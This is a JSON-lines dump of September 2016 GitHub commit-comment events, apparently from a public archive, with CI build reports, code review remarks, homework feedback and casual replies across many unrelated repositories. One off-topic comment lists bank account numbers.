{"id":"4539169841","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18960222,"position":null,"line":null,"path":null,"commit_id":"4856531eeb3fc373f9ea9bbb4bb95c3406182d90","created_at":"2016-09-09T09:53:56Z","updated_at":"2016-09-09T09:53:56Z","body":"radiance_measure_2.0 (rpg777) - Win64-Windows-7-VisualStudio-12: Tests Failed (2162 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4856531eeb3fc373f9ea9bbb4bb95c3406182d90-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.32%25-red.svg)</a> \n"}},"created_at":"2016-09-09T09:53:56Z"}
{"id":"4539178314","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18960234,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-09T09:55:44Z","updated_at":"2016-09-09T09:55:44Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.769.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76791&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:12"}},"created_at":"2016-09-09T09:55:44Z"}
{"id":"4539178819","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18960236,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-09T09:55:51Z","updated_at":"2016-09-09T09:55:51Z","body":"So, AFAIK this actually means that we are *not strict enough* regarding duplicate detection (and I guess also regarding correlation of responses to requests).\r\n\r\nMaybe we should really introduce an `EndpointAddress` in order to abstract away the matching rules that differ between plain UDP and DTLS. For plain UDP the `UdpEndpointAddress` could simply consider IP address:port whereas `DtlsEndpointAddress` could consider session ID (and maybe also IP address:port, depending on whether we can find out what the CoAP spec really means ;-)).\r\nWe could then use the `EndpointAddress` as the scope of `KeyMID` and `KeyToken`, thus making it easier fo rus to adapt the matching rules.\r\n"}},"created_at":"2016-09-09T09:55:51Z"}
{"id":"4539186749","type":"CommitCommentEvent","actor":{"login":"kirjakov"},"repo":{"name":"Ostor/lab"},"payload":{"comment":{"id":18960252,"position":null,"line":null,"path":null,"commit_id":"3a5e2915973426aa92ad9e65ea7caff09f797bad","created_at":"2016-09-09T09:57:38Z","updated_at":"2016-09-09T09:57:38Z","body":"1"}},"created_at":"2016-09-09T09:57:38Z"}
{"id":"4539187603","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":18960253,"position":null,"line":null,"path":null,"commit_id":"23026252a85d931c2e93678ee5f1cc438ed0ffa5","created_at":"2016-09-09T09:57:50Z","updated_at":"2016-09-09T09:57:50Z","body":"In which version of **KPMcore** was the API change?"}},"created_at":"2016-09-09T09:57:50Z"}
{"id":"4539194280","type":"CommitCommentEvent","actor":{"login":"Elbertbiggs360"},"repo":{"name":"Elbertbiggs360/e-p"},"payload":{"comment":{"id":18960269,"position":3,"line":2,"path":"README.md","commit_id":"f8e9655d8efb971d703d44d8c541f8abde384c4e","created_at":"2016-09-09T09:59:15Z","updated_at":"2016-09-09T09:59:15Z","body":"not yet complete"}},"created_at":"2016-09-09T09:59:15Z"}
{"id":"4543043293","type":"CommitCommentEvent","actor":{"login":"jaredly"},"repo":{"name":"whitequark/ppx_deriving"},"payload":{"comment":{"id":18971686,"position":null,"line":null,"path":null,"commit_id":"c9e69b2bb18f620d0e4f7a9a0e0db4c19f70de49","created_at":"2016-09-10T00:00:22Z","updated_at":"2016-09-10T00:00:22Z","body":"thanks for getting that :)\r\nalso thanks for this awesome project, it's soo useful!"}},"created_at":"2016-09-10T00:00:22Z"}
{"id":"4543043362","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971688,"position":44,"line":37,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-10T00:00:23Z","updated_at":"2016-09-10T00:00:23Z","body":"As the interpreter goes through the lists given to it, it evaluates them and reduces them to a value that is then outputted to the user. For example, the list '(+ 1 2)' is reduced to the value 3."}},"created_at":"2016-09-10T00:00:23Z"}
{"id":"4543046831","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18971698,"position":null,"line":null,"path":null,"commit_id":"7ea0fcabc09edb080255338881844d29cb901b2b","created_at":"2016-09-10T00:01:39Z","updated_at":"2016-09-10T00:01:39Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7ea0fcabc09edb080255338881844d29cb901b2b-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T00:01:39Z"}
{"id":"4543046837","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18971699,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T00:01:39Z","updated_at":"2016-09-10T00:01:39Z","body":"Wondering; could we use `process.argv` to specify the root path explicitly and then avoid all of this `__dirName` things?"}},"created_at":"2016-09-10T00:01:39Z"}
{"id":"4543047680","type":"CommitCommentEvent","actor":{"login":"rubenmachuca"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18971701,"position":null,"line":null,"path":null,"commit_id":"2250612cb861947c3fcaab91f0d60d116978a88e","created_at":"2016-09-10T00:01:58Z","updated_at":"2016-09-10T00:01:58Z","body":" apoyo para la integracion a cuenta pyme banamex   swift  BNMXMXMM   cuenta pesos mexicanos 002028700987674347     cuenta en dollares americanos   002028700291143807   \r\nagradesco su cooperacion y si estoy comprometido"}},"created_at":"2016-09-10T00:01:58Z"}
{"id":"4543056446","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18971713,"position":48,"line":106,"path":"gpMgmt/bin/gppylib/operations/restore.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-10T00:05:29Z","updated_at":"2016-09-10T00:05:29Z","body":"table_set_from_metadata_file is a list "}},"created_at":"2016-09-10T00:05:29Z"}
{"id":"4543056594","type":"CommitCommentEvent","actor":{"login":"SasquatchMighty"},"repo":{"name":"SasquatchMighty/CEG-4110-Homework-Phares"},"payload":{"comment":{"id":18971714,"position":null,"line":null,"path":null,"commit_id":"e4bf47c6385551bed902600796931a6b12e5bcb6","created_at":"2016-09-10T00:05:32Z","updated_at":"2016-09-10T00:05:32Z","body":"This is the completed Homework 1 PDF"}},"created_at":"2016-09-10T00:05:32Z"}
{"id":"4543057987","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18971721,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T00:06:07Z","updated_at":"2016-09-10T00:06:07Z","body":"Sure, I'll take a look later unless you want to tackle it now?"}},"created_at":"2016-09-10T00:06:07Z"}
{"id":"4543058624","type":"CommitCommentEvent","actor":{"login":"lscoder"},"repo":{"name":"lscoder/huge-file-processor"},"payload":{"comment":{"id":18971723,"position":null,"line":null,"path":null,"commit_id":"1d5be4acdd0b3ef6e37938295db65b7a081448b4","created_at":"2016-09-10T00:06:22Z","updated_at":"2016-09-10T00:06:22Z","body":"Nossa... Só hoje é que vi esse comentário hahaha\r\nSim, era entrevista. Mas eu não fui o entrevistado, mas um amigo meu.\r\nE isso foi depois que ele já tinha enviado a solução dele.\r\nSó ficou curioso para saber se tinha uma forma mais eficiente para resolver  😃 "}},"created_at":"2016-09-10T00:06:22Z"}
{"id":"4543061228","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971727,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-10T00:07:22Z","updated_at":"2016-09-10T00:07:22Z","body":"> If there is some issue with I/O, I would think it is because the 'update()' callback does a lot of stuff\r\nNot entirely truth.  Working with terminal with high frequency is definitely not \"empty\" function call.\r\n\r\nI would have just one requirement so that on **extremely** slow connections the update() will be called\r\nat least as often as the next() is called, but that's probably already in your proposal. "}},"created_at":"2016-09-10T00:07:22Z"}
{"id":"4543062695","type":"CommitCommentEvent","actor":{"login":"crew102"},"repo":{"name":"crew102/stm"},"payload":{"comment":{"id":18971735,"position":81,"line":78,"path":"R/topicLasso.R","commit_id":"b3d7b13feab693b3b348769d29af8298649c422c","created_at":"2016-09-10T00:07:57Z","updated_at":"2016-09-10T00:07:57Z","body":"Realizing now that the many spaces between \"outcome\" and \"higher\" may of been on purpose."}},"created_at":"2016-09-10T00:07:57Z"}
{"id":"4543064803","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971739,"position":44,"line":37,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-10T00:08:47Z","updated_at":"2016-09-10T00:08:47Z","body":"Github won't let me leave comments below this line so here we go\"\r\n\r\nWhy is it nonsensical? Doesn't the interpreter encounter lists and reduce them? Why can't it here? Why do we care about delayed evaluation? Won't typing just '(1 2 3) and nothing else be delayed and then cause an error if a file is outputted to the interpreter? It doesn't matter why this helps for Haskell's list structure really. If anything you should be talking about how this list needs an operator to work on it like + * / or -\r\n\r\nWhat is the procedure car for? The head of a list?\r\nSame with cadr and cons. Do they have to be used with ' or will it work without it?\r\ncould I run (car 1 2 3) and get 1? That section needs fleshing out. \r\n\r\nLines 54 and 55 seem a bit much. Stages of interpretation should be earlier.\r\n\r\nWith LispVal you need to step them through writing code. All of that code that you show bit by bit and eventually be assembled into a file they can look at in the repo that you can tag at various chapters that they can look at to see how it progresses \r\n\r\nExample: https://github.com/phil-opp/blog_os\r\n\r\nYou should look back at 48 hours and see how it's written and follow a similar approach."}},"created_at":"2016-09-10T00:08:47Z"}
{"id":"4543065852","type":"CommitCommentEvent","actor":{"login":"amschaal"},"repo":{"name":"amschaal/django-ezreg"},"payload":{"comment":{"id":18971742,"position":null,"line":null,"path":null,"commit_id":"2089db75da9d53417867252081c04d7e90220b2a","created_at":"2016-09-10T00:09:15Z","updated_at":"2016-09-10T00:09:15Z","body":"Closes #20 "}},"created_at":"2016-09-10T00:09:15Z"}
{"id":"4543067110","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18971744,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T00:09:45Z","updated_at":"2016-09-10T00:09:45Z","body":"No rush, I was just wondering as I thought about this. Leave it for now for sure :)"}},"created_at":"2016-09-10T00:09:45Z"}
{"id":"4543077507","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18971760,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T00:14:20Z","updated_at":"2016-09-10T00:14:20Z","body":"Turns out there is `Log.info('dir: ' + process.cwd());`"}},"created_at":"2016-09-10T00:14:20Z"}
{"id":"4543084747","type":"CommitCommentEvent","actor":{"login":"weiqu"},"repo":{"name":"weiqu/cici"},"payload":{"comment":{"id":18971773,"position":null,"line":null,"path":null,"commit_id":"5006d9b76ad2b6ac1a1936fdbafbce4d6842dcef","created_at":"2016-09-10T00:17:35Z","updated_at":"2016-09-10T00:17:35Z","body":" java"}},"created_at":"2016-09-10T00:17:35Z"}
{"id":"4543094035","type":"CommitCommentEvent","actor":{"login":"memocaan"},"repo":{"name":"memocaan/mount"},"payload":{"comment":{"id":18971790,"position":null,"line":null,"path":null,"commit_id":"19bf20f390e7e4eefc8d9b59ee2250154c282ec5","created_at":"2016-09-10T00:21:50Z","updated_at":"2016-09-10T00:21:50Z","body":"New"}},"created_at":"2016-09-10T00:21:50Z"}
{"id":"4543094419","type":"CommitCommentEvent","actor":{"login":"aduriseti"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971791,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-10T00:22:02Z","updated_at":"2016-09-10T00:22:02Z","body":"Very true - I would separate the I/O frequency limitation from the ETA also"}},"created_at":"2016-09-10T00:22:02Z"}
{"id":"4543094541","type":"CommitCommentEvent","actor":{"login":"LVPYassine"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18971793,"position":null,"line":null,"path":null,"commit_id":"7d6a066b6945e8a248c2de26e9411f570bd181f2","created_at":"2016-09-10T00:22:06Z","updated_at":"2016-09-10T00:22:06Z","body":"Hello \r\n\r\ni just want to suggest :\r\n\r\n- Add a Message (like memo) in the house\r\n- set pos in skin request class in the pv house (means he choose skin in he house)\r\n-Add a 3D Label in The PV Cars \r\n\r\nanyway : \r\n\r\nGood Job !!\r\n\r\nYassine"}},"created_at":"2016-09-10T00:22:06Z"}
{"id":"4543096709","type":"CommitCommentEvent","actor":{"login":"66-Teja"},"repo":{"name":"66-Teja/dropdown_toggle"},"payload":{"comment":{"id":18971802,"position":null,"line":null,"path":null,"commit_id":"0334a32df9c44eb2a65877206e79ace4f2fa8a7e","created_at":"2016-09-10T00:23:05Z","updated_at":"2016-09-10T00:23:05Z","body":"A dropdown menu and toggle button using jquery and javascript. "}},"created_at":"2016-09-10T00:23:05Z"}
{"id":"4543097555","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":18971807,"position":null,"line":null,"path":null,"commit_id":"7d6a066b6945e8a248c2de26e9411f570bd181f2","created_at":"2016-09-10T00:23:30Z","updated_at":"2016-09-10T00:23:30Z","body":"Hi Yassine,\r\n\r\nPlease file issues for your suggestions. Welcome messages are planned, as is the ability to take notes (#297).\r\n\r\nThanks,\r\nRussell"}},"created_at":"2016-09-10T00:23:30Z"}
{"id":"4543098032","type":"CommitCommentEvent","actor":{"login":"RandomlyKnighted"},"repo":{"name":"beagleterm/beagle-term"},"payload":{"comment":{"id":18971808,"position":null,"line":null,"path":null,"commit_id":"5dc9e15782be365f4947ad7d35116556b90349e1","created_at":"2016-09-10T00:23:43Z","updated_at":"2016-09-10T00:23:43Z","body":"I'd prefer not to if that's ok. I'm pretty accessible via various social media outlets so it's not hard to reach me."}},"created_at":"2016-09-10T00:23:43Z"}
{"id":"4543102387","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":18971814,"position":null,"line":null,"path":null,"commit_id":"c88478c5c4b73eedfbe314dd71386b668bd4c3ea","created_at":"2016-09-10T00:25:49Z","updated_at":"2016-09-10T00:25:49Z","body":"http://stackoverflow.com/questions/10265798/determine-project-root-from-a-running-node-js-application"}},"created_at":"2016-09-10T00:25:49Z"}
{"id":"4543105865","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":18971821,"position":null,"line":null,"path":null,"commit_id":"deb0d038811080919b179dd501fe337ef7afcd86","created_at":"2016-09-10T00:27:33Z","updated_at":"2016-09-10T00:27:33Z","body":"All changes on DocumentDashboard pages."}},"created_at":"2016-09-10T00:27:33Z"}
{"id":"4543106284","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18971824,"position":15,"line":210,"path":"src/map/enmity_container.cpp","commit_id":"9120d3301e63258b9397cf97e037d25f60e62e89","created_at":"2016-09-10T00:27:45Z","updated_at":"2016-09-10T00:27:45Z","body":"are you sure that cure V is not modified by enmity +/-?"}},"created_at":"2016-09-10T00:27:45Z"}
{"id":"4543106569","type":"CommitCommentEvent","actor":{"login":"coldsnape"},"repo":{"name":"coldsnape/my-project"},"payload":{"comment":{"id":18971826,"position":null,"line":null,"path":null,"commit_id":"288808bf76c5bbee615fc7e68eb1a446777f40c7","created_at":"2016-09-10T00:27:54Z","updated_at":"2016-09-10T00:27:54Z","body":"Got it! Thanks!"}},"created_at":"2016-09-10T00:27:54Z"}
{"id":"4543109572","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-cloud"},"payload":{"comment":{"id":18971831,"position":null,"line":null,"path":null,"commit_id":"620dbb8936df7282192fba1052f9100ac0c2bbd5","created_at":"2016-09-10T00:29:21Z","updated_at":"2016-09-10T00:29:21Z","body":"👍 "}},"created_at":"2016-09-10T00:29:21Z"}
{"id":"4543111002","type":"CommitCommentEvent","actor":{"login":"zyt611"},"repo":{"name":"zyt611/Kayak"},"payload":{"comment":{"id":18971833,"position":11,"line":8,"path":"Fix","commit_id":"e1cef87cdef16dd69d07ded4e824ea8d3abcf55d","created_at":"2016-09-10T00:30:04Z","updated_at":"2016-09-10T00:30:04Z","body":"sf = sf.setSearchType(FlightSearchType.ROUND_TRIP);"}},"created_at":"2016-09-10T00:30:04Z"}
{"id":"4543112777","type":"CommitCommentEvent","actor":{"login":"maxtherabbit"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18971837,"position":15,"line":210,"path":"src/map/enmity_container.cpp","commit_id":"9120d3301e63258b9397cf97e037d25f60e62e89","created_at":"2016-09-10T00:30:51Z","updated_at":"2016-09-10T00:30:51Z","body":"I am not sure, should I add it back in?"}},"created_at":"2016-09-10T00:30:51Z"}
{"id":"4543113074","type":"CommitCommentEvent","actor":{"login":"rainbeam"},"repo":{"name":"brainbot-com/solidity-static"},"payload":{"comment":{"id":18971838,"position":null,"line":null,"path":null,"commit_id":"92efe49942042a7fb22af94b96a2c0c08ec63034","created_at":"2016-09-10T00:31:00Z","updated_at":"2016-09-10T00:31:00Z","body":":grinning: "}},"created_at":"2016-09-10T00:31:00Z"}
{"id":"4543113825","type":"CommitCommentEvent","actor":{"login":"greghe"},"repo":{"name":"skillz/mopub-ios-sdk"},"payload":{"comment":{"id":18971841,"position":7,"line":722,"path":"MoPubSDK/Internal/MRAID/MRController.m","commit_id":"224fb8351cee750018763b781c4271a687a18275","created_at":"2016-09-10T00:31:21Z","updated_at":"2016-09-10T00:31:21Z","body":"The first and third clauses appear to be redundant since they are already tested by the second. \r\n"}},"created_at":"2016-09-10T00:31:21Z"}
{"id":"4543120504","type":"CommitCommentEvent","actor":{"login":"GirafiStudios"},"repo":{"name":"PenguinSquad/Harvest-Festival"},"payload":{"comment":{"id":18971851,"position":null,"line":null,"path":null,"commit_id":"35874c1721d6ca4ae6931d2057975d441d350a09","created_at":"2016-09-10T00:34:37Z","updated_at":"2016-09-10T00:34:37Z","body":"I shall now rule the world!"}},"created_at":"2016-09-10T00:34:37Z"}
{"id":"4543127955","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18971861,"position":15,"line":210,"path":"src/map/enmity_container.cpp","commit_id":"9120d3301e63258b9397cf97e037d25f60e62e89","created_at":"2016-09-10T00:38:20Z","updated_at":"2016-09-10T00:38:20Z","body":"yes, and probably tranquil heart as well\n\nOn Fri, Sep 9, 2016 at 6:30 PM, maxtherabbit <notifications@github.com>\nwrote:\n\n> I am not sure, should I add it back in?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DarkstarProject/darkstar/commit/9120d3301e63258b9397cf97e037d25f60e62e89#commitcomment-18971837>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGI_--gHf2M3C_ulg7aQGBUZ5Dr8h63ks5qofo8gaJpZM4J5lb5>\n> .\n>\n"}},"created_at":"2016-09-10T00:38:20Z"}
{"id":"4543128708","type":"CommitCommentEvent","actor":{"login":"oslboreal"},"repo":{"name":"oslboreal/tp_laboratorio_1"},"payload":{"comment":{"id":18971863,"position":null,"line":null,"path":null,"commit_id":"301c9ae3cfa0fd2eb61636ca9c3bed0771909b8f","created_at":"2016-09-10T00:38:42Z","updated_at":"2016-09-10T00:38:42Z","body":"Bug*"}},"created_at":"2016-09-10T00:38:42Z"}
{"id":"4543132370","type":"CommitCommentEvent","actor":{"login":"MattFoley"},"repo":{"name":"skillz/mopub-ios-sdk"},"payload":{"comment":{"id":18971865,"position":7,"line":722,"path":"MoPubSDK/Internal/MRAID/MRController.m","commit_id":"224fb8351cee750018763b781c4271a687a18275","created_at":"2016-09-10T00:40:39Z","updated_at":"2016-09-10T00:40:39Z","body":"I'll update this now, thanks!"}},"created_at":"2016-09-10T00:40:39Z"}
{"id":"4543135036","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"dabd/fpscala"},"payload":{"comment":{"id":18971872,"position":43,"line":78,"path":"src/test/scala/fpinscala/DataStructures.scala","commit_id":"a1835fec4f60fd87ad7c8015d95bcbee8102c473","created_at":"2016-09-10T00:42:05Z","updated_at":"2016-09-10T00:42:05Z","body":"One thing I found was that this property, although valid, was not enough to force a correct implementation.\r\nFor example, this dummy function code also passes this property:\r\n\r\n    def reverse[A](l: List[A]): List[A] = l\r\n\r\nI forgot/didn’t save the link of where I got this property from (maybe adapted from an example using QuickCheck?) but it does forces a correct implementation:\r\nhttps://github.com/hugocf/fpinscala/blob/master/src/test/scala/fpinscala/ch03datastructures/ListSpec.scala#L260"}},"created_at":"2016-09-10T00:42:05Z"}
{"id":"4543135504","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18971874,"position":105,"line":205,"path":"gpMgmt/bin/gppylib/operations/restore.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-10T00:42:20Z","updated_at":"2016-09-10T00:42:20Z","body":"self.context.restore_tables is sometimes a list and sometimes a set. See gpdbrestore: line 99 and 101."}},"created_at":"2016-09-10T00:42:20Z"}
{"id":"4543136207","type":"CommitCommentEvent","actor":{"login":"tollofsen"},"repo":{"name":"tollofsen/uzi"},"payload":{"comment":{"id":18971876,"position":null,"line":null,"path":null,"commit_id":"1ca1317bc2b04f91fbb4441d4a3612bef9e95002","created_at":"2016-09-10T00:42:42Z","updated_at":"2016-09-10T00:42:42Z","body":"Wait. Are you telling me tirads never worked? Or did some change break them?"}},"created_at":"2016-09-10T00:42:42Z"}
{"id":"4543138492","type":"CommitCommentEvent","actor":{"login":"silver13"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18971878,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-10T00:43:53Z","updated_at":"2016-09-10T00:43:53Z","body":"you need to enable bluetooth in config.h\r\n\"#define BLUETOOTH_ENABLE\"\r\n\r\nno hardware modifications"}},"created_at":"2016-09-10T00:43:53Z"}
{"id":"4543139649","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-city"},"payload":{"comment":{"id":18971881,"position":11,"line":11,"path":"Assignment 5/starter_code/js/index.js","commit_id":"63dcbb5ef85a4c49edea4b1b14222bcd936ededd","created_at":"2016-09-10T00:44:33Z","updated_at":"2016-09-10T00:44:33Z","body":"Nice job starting to attempt the bonus! Instead of adding different conditionals for each case, perhaps try changing the variable city to all lowercase or uppercase and then compare it to that value. That way you don't have to write as many conditionals."}},"created_at":"2016-09-10T00:44:33Z"}
{"id":"4543142127","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/homework-city"},"payload":{"comment":{"id":18971894,"position":null,"line":null,"path":null,"commit_id":"63dcbb5ef85a4c49edea4b1b14222bcd936ededd","created_at":"2016-09-10T00:46:03Z","updated_at":"2016-09-10T00:46:03Z","body":"Your assignment is really great! There is really no feedback that I have for improvement. Your indenting is great, your code is clean, and your pseudocode is clear. Keep up the great work!"}},"created_at":"2016-09-10T00:46:03Z"}
{"id":"4543143462","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18971896,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-10T00:46:45Z","updated_at":"2016-09-10T00:46:45Z","body":"> Кажется, понял. В коде класс Route находится ниже класса Train, поэтому к моменту вызова этого метода еще ни один route не создался. Как это решить?)\r\n\r\nКинь пожалуйста ссылку на это конкретное место."}},"created_at":"2016-09-10T00:46:45Z"}
{"id":"4543146614","type":"CommitCommentEvent","actor":{"login":"kaknikhil"},"repo":{"name":"kaknikhil/gpdb"},"payload":{"comment":{"id":18971900,"position":137,"line":239,"path":"gpMgmt/bin/gppylib/operations/restore.py","commit_id":"51cbab34b2918394f78906fcaeffa95133a1b97a","created_at":"2016-09-10T00:48:35Z","updated_at":"2016-09-10T00:48:35Z","body":"changing restore_schemas from list to set will improve performance"}},"created_at":"2016-09-10T00:48:35Z"}
{"id":"4543151025","type":"CommitCommentEvent","actor":{"login":"gundralaa"},"repo":{"name":"gundralaa/ftc_app"},"payload":{"comment":{"id":18971913,"position":null,"line":null,"path":null,"commit_id":"d2a24c8b58e6f4b247db4c567b7b9d3647b4e7c7","created_at":"2016-09-10T00:51:02Z","updated_at":"2016-09-10T00:51:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XCFvU4gP&#x2F;1-method-programming\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Method Programming</a>"}},"created_at":"2016-09-10T00:51:02Z"}
{"id":"4543151881","type":"CommitCommentEvent","actor":{"login":"zyt611"},"repo":{"name":"zyt611/Kayak"},"payload":{"comment":{"id":18971914,"position":16,"line":13,"path":"Fix","commit_id":"e1cef87cdef16dd69d07ded4e824ea8d3abcf55d","created_at":"2016-09-10T00:51:33Z","updated_at":"2016-09-10T00:51:33Z","body":"if(frp.getresults().length() != 0) "}},"created_at":"2016-09-10T00:51:33Z"}
{"id":"4543151922","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18971915,"position":8,"line":8,"path":"path_10_9/data/talkactions/scripts/setname.lua","commit_id":"99cd26dd47c12d51aa5b94a9c7c0424305aded18","created_at":"2016-09-10T00:51:34Z","updated_at":"2016-09-10T00:51:34Z","body":"This function is added?"}},"created_at":"2016-09-10T00:51:34Z"}
{"id":"4543154964","type":"CommitCommentEvent","actor":{"login":"mattyx14"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18971924,"position":8,"line":8,"path":"path_10_9/data/talkactions/scripts/setname.lua","commit_id":"99cd26dd47c12d51aa5b94a9c7c0424305aded18","created_at":"2016-09-10T00:53:18Z","updated_at":"2016-09-10T00:53:18Z","body":"i check and no"}},"created_at":"2016-09-10T00:53:18Z"}
{"id":"4543156252","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":18971927,"position":79,"line":54,"path":"Assignment/starter_code/js/index.js","commit_id":"23e13bee9a7f0535ed30207c6a65935f0224b7a5","created_at":"2016-09-10T00:54:00Z","updated_at":"2016-09-10T00:54:00Z","body":"Wow, nice job experimenting with arrays! It's awesome to see you challenging yourself."}},"created_at":"2016-09-10T00:54:00Z"}
{"id":"4543156418","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18971928,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-10T00:54:06Z","updated_at":"2016-09-10T00:54:06Z","body":"> Не прокатило. :(\r\n\r\nИдея интересная, но сложная. В том смысле, что нам же нужно не только текущую станцию показывать, но ещё и предыдущую и следующую.\r\n\r\nПонятно что можно взять индекс текущей станции и понять что там до неё и после. Попробуй подумать в сторону переменной `@current_station_index` для поезда."}},"created_at":"2016-09-10T00:54:06Z"}
